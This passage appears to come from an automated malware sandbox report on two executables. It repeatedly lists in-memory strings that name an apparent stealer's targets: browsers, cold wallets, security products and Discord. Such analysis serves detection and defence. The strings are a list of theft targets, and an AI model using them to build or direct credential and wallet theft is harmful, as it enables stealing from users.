0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionBrowsers
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionBrowsersLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionBrowsersResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionBrowsersResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionColdWallets
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionColdWalletsLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionColdWalletsResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionColdWalletsResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDefenders
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDefendersLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDefendersResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDefendersResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDiscord
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDiscordLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 